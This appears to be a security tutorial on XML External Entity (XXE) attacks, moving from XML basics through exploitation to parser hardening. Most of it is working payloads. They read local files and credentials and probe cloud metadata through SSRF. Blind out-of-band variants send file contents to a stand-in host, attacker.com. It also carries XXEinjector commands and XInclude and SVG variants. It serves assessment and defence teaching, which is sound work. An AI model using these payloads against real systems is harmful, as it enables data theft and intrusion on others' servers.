Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.
XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.
<?xml version="1.0" encoding="UTF-8"?> <!-- XML declaration --> <order> <!-- root element (exactly ONE) --> <customer id="42"> <!-- element with attribute --> <name>Alice</name> <email>alice@example.com</email> </customer> <item qty="3">Widget</item> </order>
A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.
Formats: XSD (XML Schema Definition), DTD, RelaxNG.
A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.
<!-- Internal DTD --> <!DOCTYPE note [ <!ENTITY author "Alice"> ]> <note> Written by &author; <!-- → "Alice" --> </note>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <data>&xxe;</data> <!-- Parser fetches /etc/passwd and inlines it here -->
| Entity Type | Syntax | Source | XXE Risk |
|---|---|---|---|
| Internal | <!ENTITY name "value"> | Literal string in DTD | Low |
| External (file) | <!ENTITY name SYSTEM "file:///..."> | Local filesystem | Critical |
| External (HTTP) | <!ENTITY name SYSTEM "http://..."> | Remote URL | SSRF |
| Parameter entity | <!ENTITY % name SYSTEM "..."> | Used inside DTD only | Blind XXE |
| Character entity | < & | Built-in XML escaping | None |
XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.
Content-Type: text/xml)application/xmlContent-Type to XML and re-sendContent-Type headersXXE exists because most XML parsers support external entities by default. It's a feature, not a bug — until untrusted input hits it.
User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.
The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and — by default — processes it.
The parser fetches the external resource (file, URL) and substitutes it into the document tree.
If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.
/etc/passwd, app configs, SSH keys, source code169.254.169.254)expect:// wrapper<, >, & break XML parsing → need out-of-band or CDATA tricksSYSTEM keyword or <!DOCTYPEThe classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.
Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".
Prepend (or replace) the DOCTYPE to declare your entity.
Put &xxe; where the echoed value was.
The file contents appear where the entity was referenced.
<?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck> <productId>&xxe;</productId> <!-- reflected field --> <storeId>1</storeId> </stockCheck>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Other useful file targets:
| File | What you get |
|---|---|
/etc/passwd | User list, shells — confirms XXE works |
/etc/hostname | Machine name — useful for SSRF targeting |
/proc/self/environ | Environment variables — often contains secrets |
/proc/self/cmdline | Running process & args |
~/.ssh/id_rsa | Private SSH key |
/var/www/html/config.php | App source, DB credentials |
C:\Windows\win.ini | Windows confirmation payload |
file:///C:/inetpub/wwwroot/web.config | IIS config, connection strings |
Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.
<!DOCTYPE foo [ <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]> <data>&ssrf;</data>
<!-- Try systematically; timing difference reveals open vs. closed --> <!DOCTYPE foo [ <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/"> ]> <data>&ssrf;</data>
169.254.169.254 — AWS/GCP/Azure metadatahttp://localhost:8080 — admin panelshttp://internal-db:5432 — databaseshttp://elasticsearch:9200/_cat/indiceshttp://kubernetes.default.svc — k8s APIWhen the application processes XML but never reflects values back, you need out-of-band channels. The payload triggers an outbound connection to a server you control — proving the vulnerability and potentially exfiltrating data.
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://YOUR.COLLABORATOR.ID.oastify.com/"> ]> <data>&xxe;</data> <!-- If Collaborator gets a DNS/HTTP hit → XXE confirmed blind -->
You can't nest entity references directly in an internal DTD. Instead, host a malicious DTD on your server and fetch it with a parameter entity.
<!DOCTYPE foo [ <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; ]> <data>anything</data>
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?x=%file;'>"> %exfil; %send;
< > &) break the URL. Wrap with CDATA: use a second parameter entity to construct <![CDATA[ around the file read — or use DNS exfil (hex-encode the data as subdomains).<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % error "<!ENTITY % boom SYSTEM '%file;/nonexistent'>"> %error; %boom; <!-- Parser error message contains the file path including the file contents — visible in 500 error response -->
Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:
<!-- No DOCTYPE needed. XInclude uses a namespace. --> <foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </foo>
parse="text" is key — without it, the parser tries to parse the file as XML.<?xml version="1.0"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg xmlns="http://www.w3.org/2000/svg"> <text y="20">&xxe;</text> </svg> <!-- Upload as .svg / image/svg+xml Content may appear rendered in browser or in response if fetched directly -->
| Scenario | Technique | Requirement |
|---|---|---|
| Full XML body control | Classic DOCTYPE injection | Parser allows external entities |
| Control a value inside XML | XInclude | Server supports XInclude processing |
| File upload (image) | SVG with DOCTYPE | Server parses SVG as XML |
| DOCX/XLSX upload | Modify embedded XML parts | Server opens/processes the file |
| JSON that becomes XML | Content-Type swap + classic | Backend converts JSON→XML |
For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.
# Minimal Python HTTP server that logs all requests python3 -m http.server 80 # Or with request logging to file: python3 -c " import http.server, sys class L(http.server.BaseHTTPRequestHandler): def do_GET(self): print(f'[HIT] {self.path}', flush=True) self.send_response(200); self.end_headers() http.server.HTTPServer(('',80),L).serve_forever() "
# Listen for DNS queries (your NS for attacker.com must point here) tcpdump -i eth0 -n udp port 53 | grep attacker.com # Or use interactsh-client (open source Burp Collaborator alternative) interactsh-client -v # gives you: abc123.oast.fun — use as your callback domain
| Tool | Use Case | Notes |
|---|---|---|
| Burp Suite Pro | Intercept, modify, replay XML; Collaborator for blind OOB | Go-to for manual XXE |
| Burp Collaborator | DNS/HTTP callback server, auto-correlated | Built into Burp Pro; use oastify.com domains |
| interactsh | Open-source Collaborator alternative | interactsh-client CLI |
| XXEinjector | Automated XXE file enumeration & OOB exfil | Ruby; good for bulk file reads |
| xmllint | Parse & test DTD structure locally | xmllint --noent payload.xml |
| Python requests | Scripted payload delivery | Set Content-Type: application/xml |
Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.
XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.
Your listener receives GET /?data=root:x:0:0:...%0Adaemon:.... URL-decode the parameter to get the file.
ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http
Configure your XML parser to reject external entities and DTD processing. This is the direct fix.
Prefer JSON or YAML for APIs. Less attack surface, no entity concept. Only use XML where necessary.
Validate that XML conforms to expected schema before parsing. Reject documents with DOCTYPE declarations unless required.
XML parser libraries regularly patch XXE-related issues. Run npm audit, mvn dependency-check, etc. regularly.
| Language / Parser | Safe Configuration |
|---|---|
| Java (SAXParser) | factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) |
| Java (DocumentBuilder) | factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true) |
| Python (lxml) | etree.XMLParser(resolve_entities=False, no_network=True) |
| Python (defusedxml) | Drop-in safe replacement: import defusedxml.ElementTree as ET |
| .NET (XmlReader) | XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit } |
| PHP (libxml) | libxml_disable_entity_loader(true) (PHP < 8.0; disabled by default in 8.0+) |
| Node.js (node-expat / libxmljs) | Check for resolve_entities: false; prefer sax or validated parsers |
| Ruby (Nokogiri) | Nokogiri::XML::ParseOptions::NONET | NOENT |
# pip install defusedxml import defusedxml.ElementTree as ET # Any XXE/XInclude/entity bomb attempt raises an exception tree = ET.parse("user_input.xml") # safe drop-in root = tree.getroot()
SAXParserFactory factory = SAXParserFactory.newInstance(); factory.setFeature( "http://apache.org/xml/features/disallow-doctype-decl", true ); factory.setFeature( "http://xml.org/sax/features/external-general-entities", false ); factory.setFeature( "http://xml.org/sax/features/external-parameter-entities", false ); SAXParser parser = factory.newSAXParser();
cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html — comprehensive parser-by-parser reference.| Goal | Payload Skeleton |
|---|---|
| Read local file (inline) | <!ENTITY x SYSTEM "file:///etc/passwd"> … &x; |
| SSRF / internal HTTP | <!ENTITY x SYSTEM "http://169.254.169.254/..."> |
| Blind OOB ping | <!ENTITY x SYSTEM "http://collaborator.id/"> |
| Blind OOB + file exfil | Parameter entity → external evil.dtd → %file; in URL |
| Error-based | %file; used in invalid path → error message leaks content |
| XInclude (no DOCTYPE) | <xi:include parse="text" href="file:///etc/passwd"/> |
| SVG upload | SVG with DOCTYPE + <text>&xxe;</text> |
| DoS (Billion Laughs) | Nested entities: &lol9; expands to 10^9 copies of "lol" |